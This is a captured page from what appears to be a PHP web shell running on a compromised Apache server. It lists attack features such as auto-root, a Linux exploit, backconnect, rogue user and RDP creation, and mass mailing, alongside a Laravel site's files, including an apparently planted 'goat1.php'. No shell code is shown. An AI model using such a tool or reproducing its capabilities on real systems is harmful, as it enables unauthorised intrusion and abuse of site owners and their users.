Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.20
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo18.com /
routes /
[ HOME SHELL ]
Name
Size
Permission
Action
routes
[ DIR ]
drwxr-xr-x
.htaccess
127
B
-r--r--r--
api.php
815
B
-rw-rw-r--
auth.php
2.35
KB
-rw-rw-r--
broadcasting.php
82
B
-rw-rw-r--
channels.php
168
B
-rw-rw-r--
console.php
220
B
-rw-rw-r--
goat1.php
143.87
KB
-rw-r--r--
installer.php
1.08
KB
-rw-rw-r--
updater.php
346
B
-rw-rw-r--
web.php
16.12
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : api.php
<?php use Illuminate\Http\Request; use Illuminate\Support\Facades\Route; use App\Http\Controllers\Api\AuthApiController; Route::middleware('api.json')->group(function () { Route::post('/login', [AuthApiController::class, 'login']); Route::middleware('auth:sanctum')->group(function () { Route::get('/user', function (Request $request) { return $request->user(); }); Route::post('/logout', [AuthApiController::class, 'logout']); Route::post('/refresh', [AuthApiController::class, 'refresh']); Route::post('/change-password', [AuthApiController::class, 'changePassword']); Route::post('/edit-profile', [AuthApiController::class, 'editProfile']); Route::delete('/delete-account', [AuthApiController::class, 'deleteAccount']); }); });
Close